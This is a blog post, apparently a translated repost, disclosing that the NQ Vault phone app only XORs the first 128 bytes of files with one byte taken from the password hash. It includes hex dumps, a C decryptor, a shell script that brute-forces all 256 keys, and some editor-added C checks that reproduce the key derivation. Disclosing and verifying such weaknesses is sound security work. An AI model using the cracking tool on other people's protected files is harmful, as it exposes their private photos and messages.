How I cracked "NetQin Private Space (NQ Vault)" in three days

Source: Internet
Author: User


What is "NetQin Private Space (NQ Vault)"?
"NetQin Private Space" (NQ Vault) is a mobile phone encryption app. It lets users set a private password and "encrypt" photos, text messages, or other data. If an attacker wants to view that content, they first need the private password; even if they pull the data off the device, it is supposed to be useless because it is encrypted.
NQ Vault is well rated in the Google store:
1. One of the most popular apps, with more than 30 million users worldwide
2. CTIA-Techlicious 2012, CTIA Award
3. PC Magazine recent app
4. TRUSTe "TRUSTe Privacy Seal"
5. Global Mobile Internet Conference top 50
NetQin's promotional slogan is good too: hide all the secrets on your mobile phone!
Over the next three days I will show how an attacker can pull the "encrypted" data out of NetQin Private Space (NQ Vault) and read the original file in a few seconds.
Day 1

I used GIMP to create a 1-pixel image named test.png and appended a marker string to it with the following command:
echo NINJADOGE24 >> test.png
Then I encrypted it with NQ Vault v6.1.00.22, using the password 2424.
The original file test.png is as follows:
0000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452. PNG ...... IHDR
0000010: 0000 0001 0000 0001 0802 0000 0090 ...... wS
0000020: de00 0000 0970 4859 7300 b100 0003 ...... pHYs .......
0000030: b101 f583 ed49 0000 0007 7449 4d45 07df ...... I ...... tIME ..
0000040: 0401 0319 3a3d ca0b 0c00 0000 0c69 5458 ......: = ...... iTX
0000050: 7443 6f6d 6d65 6e74 0000 0000 00bc aeb2 tComment ........
0000060: 9900 0000 0f49 4441 5408 1d01 0400 fbff ...... IDAT .......
0000070: 00ff 0000 0301 0100 c706 926f 0000 0000 ....
0000080: 4945 4e44 ae42 6082 4e49 4e4a 4144 4f47 IEND. B '. NINJADOG
0000090: 4532 340a E24.
NQ Vault's SQLite database records where the encrypted file is stored.

After encryption, the file is stored as 1427858907181.png:
0000000: 8d54 4a43 090e 1e0e 0404 0409 4d4c 4056. TJC ...... ML @ V
0000010: 0404 0405 0404 0c06 0405 0404 0494 ...... sW
0000020: da04 0404 0d74 4c5d 7704 0407 b504 0407 ...... tL] w .......
0000030: b505 f187 e94d 0404 0403 704d 4941 03db ...... M ...... pMIA ..
0000040: 0005 071d 3e39 ce0f 0804 0404 086d 505c ......> 9 ...... mP \
0000050: 7047 6b69 6961 6a70 0404 0404 04b8 aab6 pGkiiajp ........
0000060: 9d04 0404 0b4d 4045 500c 1905 0004 fffb ...... M @ EP .......
0000070: 04fb 0404 0705 0504 c302 966b 0404 0404 ....
0000080: 4945 4e44 ae42 6082 4e49 4e4a 4144 4f47 IEND. B '. NINJADOG
0000090: 4532 340a E24.
Interesting: I had expected it to encrypt the whole file, including the NINJADOGE24 at the end.
Then I fed the two headers into the bitwise calculator at http://jdejong.net/tools/bitwisecalculator.php and got:
89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49
XOR
8D 54 4A 43 09 0E 1E 0E 04 04 04 09 4D
=
04 04 04 04 04 04 04 04 04 04 04 04 04
Wow. Did I mention that the premium version of NQ Vault costs $7.99 a year? I bet they are using XOR2048 Enhanced Mode for the encryption.
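As an added example (not code from the original post), here is a small C check that confirms what the two dumps above show without a calculator: the bytes of the "encrypted" file differ from the original by one constant XOR byte, and the file tail is untouched. The 16 header bytes are the ones quoted in the dumps above; the rest of the buffer is constructed filler, and the constant VAULT_XOR_SPAN (the 128-byte span the post measures on Day 2) and all function names are my own. The same check works when only the expected file signature is known, which is how a defender can tell whether a "vault" app is really encrypting anything.

```c
/* Added example: does a "vault" file differ from the original by one constant
 * XOR byte, and is everything after the first 128 bytes left in plaintext?
 * Not part of the original post; names and the filler bytes are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define VAULT_XOR_SPAN 128   /* the post observes that only the first 128 bytes change */

/* Result of comparing a plaintext file with its "encrypted" counterpart. */
struct xor_check {
    int constant_key;       /* 1 if plain[i] ^ enc[i] is one constant byte for all i < span */
    uint8_t key;            /* that byte, valid when constant_key == 1 */
    size_t tail_mismatches; /* bytes at or after span that differ (0 means the tail is plaintext) */
};

/* Bytes before `span` are checked for a constant XOR difference; bytes from
 * `span` on are checked for equality. Both buffers are `n` bytes long. */
struct xor_check check_single_byte_xor(const uint8_t *plain, const uint8_t *enc,
                                       size_t n, size_t span)
{
    struct xor_check r = {1, 0, 0};
    size_t head = n < span ? n : span;
    size_t i;

    if (head == 0) {
        r.constant_key = 0;
        return r;
    }
    r.key = plain[0] ^ enc[0];
    for (i = 1; i < head; i++)
        if ((plain[i] ^ enc[i]) != r.key) {
            r.constant_key = 0;
            break;
        }
    for (i = span; i < n; i++)
        if (plain[i] != enc[i])
            r.tail_mismatches++;
    return r;
}

/* Variant for when the original file is unavailable: compare the start of the
 * "encrypted" file with the signature its type should carry. Returns 1 and
 * sets *key if those bytes differ from the signature by one constant XOR byte. */
int key_from_signature(const uint8_t *enc, size_t n,
                       const uint8_t *sig, size_t siglen, uint8_t *key)
{
    struct xor_check r;
    if (siglen == 0 || n < siglen)
        return 0;
    r = check_single_byte_xor(sig, enc, siglen, siglen);
    if (r.constant_key)
        *key = r.key;
    return r.constant_key;
}

/* Sample input: the 8-byte PNG signature, and the first 16 bytes of test.png
 * and of the vault output as quoted in the post's hex dumps. */
static const uint8_t PNG_SIG[8] = {0x89,0x50,0x4e,0x47,0x0d,0x0a,0x1a,0x0a};
static const uint8_t PLAIN_HEAD[16] = {0x89,0x50,0x4e,0x47,0x0d,0x0a,0x1a,0x0a,
                                       0x00,0x00,0x00,0x0d,0x49,0x48,0x44,0x52};
static const uint8_t ENC_HEAD[16]   = {0x8d,0x54,0x4a,0x43,0x09,0x0e,0x1e,0x0e,
                                       0x04,0x04,0x04,0x09,0x4d,0x4c,0x40,0x56};

/* Builds a 200-byte pair the way the post describes the vault behaving: the
 * quoted header, constructed filler, and only the first 128 bytes XORed with 0x04. */
struct xor_check demo_check(void)
{
    uint8_t plain[200], enc[200];
    size_t i;
    memcpy(plain, PLAIN_HEAD, sizeof PLAIN_HEAD);
    for (i = sizeof PLAIN_HEAD; i < sizeof plain; i++)
        plain[i] = (uint8_t)(i * 7);               /* constructed filler bytes */
    for (i = 0; i < sizeof plain; i++)
        enc[i] = i < VAULT_XOR_SPAN ? (uint8_t)(plain[i] ^ 0x04) : plain[i];
    return check_single_byte_xor(plain, enc, sizeof plain, VAULT_XOR_SPAN);
}

/* Recovers the key from the quoted vault header and the PNG signature alone;
 * returns -1 if the header is not a constant XOR of the signature. */
int demo_signature_key(void)
{
    uint8_t key;
    if (!key_from_signature(ENC_HEAD, sizeof ENC_HEAD, PNG_SIG, sizeof PNG_SIG, &key))
        return -1;
    return key;
}

int main(void)
{
    struct xor_check r = demo_check();
    printf("constant key: %d (0x%02x), tail bytes changed: %zu\n",
           r.constant_key, r.key, r.tail_mismatches);
    printf("key from PNG signature alone: 0x%02x\n", demo_signature_key());
    return 0;
}
```

The signature-only variant needs just 8 known bytes, which is the same observation the post makes with the bitwise calculator: a file format's fixed header is known plaintext, so a constant XOR leaks its key in the first few bytes.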
Day 2
I wrote an XOR encryption/decryption program:

// xor.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    FILE *file_a, *file_b;
    int char_a, char_b;

    if (argc != 3) {
        fprintf(stderr, "usage: %s FILE_A FILE_B > OUTPUT\n", argv[0]);
        return EXIT_FAILURE;
    }
    file_a = fopen(argv[1], "rb");
    file_b = fopen(argv[2], "rb");
    if (!file_a || !file_b) {
        perror("fopen");
        return EXIT_FAILURE;
    }

    /* XOR the two files byte by byte, stopping at the end of the shorter one */
    while ((char_a = getc(file_a)) != EOF && (char_b = getc(file_b)) != EOF)
        putchar(char_a ^ char_b);

    fclose(file_a);
    fclose(file_b);
    return EXIT_SUCCESS;
}


This time I used a 1-pixel JPEG file:
0000000: ffd8 ffe0 0010 4a46 4946 0001 0101 ...... JFIF .....'

0000010: 0060 0000 ffe1 0352 4578 6966 0000 4d4d. '... RExif... MM
0000020: 002a 0000 0008 0005 5100 0004 0000 ...... Q .......
0000030: 0000 0000 5101 0003 0000 0001 0001 ...... Q ...........
0000040: 5102 0001 0000 0300 004a 0000 5103 Q ...... JQ...
0000050: 0000 0001 0000 0000 5104 0001 0000 ...... Q .......
0000060: fc00 0000 0000 0000 0000 0000 0033 ..
0000070: 6600 0099 0000 cc00 00ff 002b 0000 2b33 f ...... + 3
0000080: 002b 6600 2b99 002b cc00 2bff 0055 0000. + f... + ..
0000090: 5533 0055 6600 5599 cc00 55ff 0055 U3.Uf. U...
00000a0: 0000 8033 0080 6600 8099 0080 cc00 80ff ...... 3 ...... f .........
00000b0: 00aa 0000 aa33 00aa 6600 aa99 00aa cc00 ...... 3 ...... f .......
-- Snip --
0000590: bac2 c3c4 c5c6 c7c8 c9ca d2d3 d4d5 d6d7 ................
00005a0: d8d9 dae2 e3e4 e5e6 e7e8 e9ea f2f3 f4f5 ................
00005b0: f6f7 f8f9 faff da00 0c03 0100 0211 0311 ................
00005c0: 003f 00f9 1e8a 28af cdcf f7b0 ffd9 4e49 .?.... (... NI
00005d0: 4e4a 4144 4f47 4532 3420 0d0a NJADOGE24 ..
Encrypted with the password 4815162342:
0000000: 3314 332c ccdc 868a 858a cccd cdcd ccac 3.3 ,............
0000010: ccac cccc 332d cf9e 89b4 a5aa cccc 8181 ...... 3 -..........
0000020: cce6 cccc ccc4 ccc9 9dcc ccc8 cccc cccd ................
0000030: cccc 9dcd cccf cccd cccc ................
0000040: 9dce cccd cccc cfcc cc86 9dcf cccd ................
0000050: cccc cccd cccc 9dc8 cccd cccc cccd ................
0000060: 30cc cccc ccff cccc 0 ...............
0000070: aacc cc55 cccc 00cc cc33 cce7 cccc e7ff ...... U ...... 3 ......
0000080: 002b 6600 2b99 002b cc00 2bff 0055 0000. + f... + ..
0000090: 5533 0055 6600 5599 cc00 55ff 0055 U3.Uf. U...
00000a0: 0000 8033 0080 6600 8099 0080 cc00 80ff ...... 3 ...... f .........
00000b0: 00aa 0000 aa33 00aa 6600 aa99 00aa cc00 ...... 3 ...... f .......
-- Snip --
0000590: bac2 c3c4 c5c6 c7c8 c9ca d2d3 d4d5 d6d7 ................
00005a0: d8d9 dae2 e3e4 e5e6 e7e8 e9ea f2f3 f4f5 ................
00005b0: f6f7 f8f9 faff da00 0c03 0100 0211 0311 ................
00005c0: 003f 00f9 1e8a 28af cdcf f7b0 ffd9 4e49 .?.... (... NI
00005d0: 4e4a 4144 4f47 4532 3420 0d0a NJADOGE24 ..
Key (original XOR encrypted):
0000000: cccc ................
0000010: cccc ................
0000020: cccc ................
0000030: cccc ................
0000040: cccc ................
0000050: cccc ................
0000060: cccc ................
0000070: cccc ................
0000080: 0000 0000 0000 0000 0000 0000 0000 ................
0000090: 0000 0000 0000 0000 0000 0000 0000 ................
00000a0: 0000 0000 0000 0000 0000 0000 0000 ................
00000b0: 0000 0000 0000 0000 0000 0000 0000 ................
-- Snip --
0000590: 0000 0000 0000 0000 0000 0000 0000 ................
00005a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00005b0: 0000 0000 0000 0000 0000 0000 0000 ................
00005c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00005d0: 0000 0000 0000 0000 0000 0a .............

Everything after the first 128 bytes is left unchanged. This is definitely the best encryption method in history!
Let's try passwords like 001, 002, 003 and see whether a pattern emerges.
Password      Key
000           30
001           31
002           32
003           33
004           34
...
010           4f
011           50
012           51
...
2424          04
4815162342    cc

Okay, I admit I'm a little interested now, because the pattern seems to break: 000 through 004 map to 30 through 34, but 010 maps to 4f instead of continuing the sequence.

In any case, trying to recreate generateKey(password) is pointless.

I have a hunch that brute force will do: try every key byte from 00 to ff (that is, 0 to 255) until a valid file comes out.

Day 3

I modified the XOR program I wrote:
// vault-crack.c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    FILE *file_a;
    int char_a, char_b, i = 0;

    if (argc != 3) {
        fprintf(stderr, "usage: %s ENCRYPTED_FILE KEY(0-255) > OUTPUT\n", argv[0]);
        return EXIT_FAILURE;
    }
    char_b = (int)strtol(argv[2], NULL, 10);
    file_a = fopen(argv[1], "rb");
    if (!file_a) {
        perror("fopen");
        return EXIT_FAILURE;
    }

    /* Only the first 128 bytes are XORed; the rest is copied through unchanged.
       The counter is advanced in its own statement: the original
       `putchar(...) && i++` skipped the increment whenever the output byte was 0x00. */
    while ((char_a = getc(file_a)) != EOF) {
        if (i < 128) {
            putchar(char_a ^ char_b);
            i++;
        } else {
            putchar(char_a);
        }
    }

    fclose(file_a);
    return EXIT_SUCCESS;
}

Brute-forcing it is easier than you might think:
#!/bin/sh
# vault-crack.sh: try every one-byte key until `file` recognises the output
for i in $(seq 0 255); do
    ./vault-crack "$1" "$i" > "$1.decrypted"
    if [ "$(file --brief --mime-type "$1.decrypted")" != "application/octet-stream" ]
    then
        echo "Key = $i" && exit
    fi
done

Compile vault-crack.c to a binary named vault-crack, put it and the script in the same directory as the file encrypted by the vault, and run the following command to decrypt the file:
./vault-crack.sh ENCRYPTED_FILE
Success!

Update

Bkerler and phaeilo pointed out the code that derives the key:
key = password.hashCode() & 0xff;

The hashCode function is Java's String.hashCode():
static int hashCode(String password)
{
    int h = 0;
    for (int i = 0; i < password.length(); i++)
    {
        h = 31*h + password.charAt(i);
    }
    return h;
}
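As an added example, not code from the post or from NQ Vault: the derivation above reimplemented in C, with the passwords from the Day 2 table as sample input. java_string_hash mirrors Java's String.hashCode() in wrapping 32-bit arithmetic, vault_key applies the & 0xff truncation, and count_pins_with_key is my own addition (all names are assumptions). It shows why the 256-try search on Day 3 is complete: whatever the password, its length, or its character set, the key is one of at most 256 bytes, and many different PINs derive the same one.

```c
/* Added example: NQ Vault's key derivation as reported in the update,
 * key = password.hashCode() & 0xff, reimplemented in C. Not code from the
 * post or the app; function names and the PIN-counting helper are mine. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Java String.hashCode(): h = 31*h + c over the characters, with int
 * overflow wrapping. uint32_t arithmetic gives the same low 32 bits. */
uint32_t java_string_hash(const char *s)
{
    uint32_t h = 0;
    for (; *s; s++)
        h = 31u * h + (uint8_t)*s;
    return h;
}

/* The vault key: only the low byte of the hash survives, so every password
 * maps to one of 256 possible keys. */
uint8_t vault_key(const char *password)
{
    return (uint8_t)(java_string_hash(password) & 0xffu);
}

/* Counts how many zero-padded numeric PINs of `digits` digits (1..9) derive
 * the given key byte, i.e. how many passwords collide on one key. */
unsigned count_pins_with_key(uint8_t key, int digits)
{
    char pin[16];
    unsigned limit = 1, count = 0, n;
    int i;

    if (digits < 1 || digits > 9)
        return 0;
    for (i = 0; i < digits; i++)
        limit *= 10;
    for (n = 0; n < limit; n++) {
        snprintf(pin, sizeof pin, "%0*u", digits, n);
        if (vault_key(pin) == key)
            count++;
    }
    return count;
}

int main(void)
{
    /* Passwords from the post's table; "3513" is a constructed PIN that
     * happens to derive the same key byte as "2424". */
    const char *samples[] = {"000", "001", "010", "2424", "3513", "4815162342"};
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("password %-10s -> key 0x%02x\n", samples[i], vault_key(samples[i]));
    printf("4-digit PINs sharing the key of 2424: %u of 10000\n",
           count_pins_with_key(vault_key("2424"), 4));
    return 0;
}
```

Two things fall out of running it: the table's values (000 -> 30, 010 -> 4f, 2424 -> 04, 4815162342 -> cc) are reproduced exactly, and a 4-digit PIN space of 10,000 values collapses onto at most 256 keys, so a password's length adds no security at all.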

The key still has to be brute-forced, though, because the password is not known when decrypting.
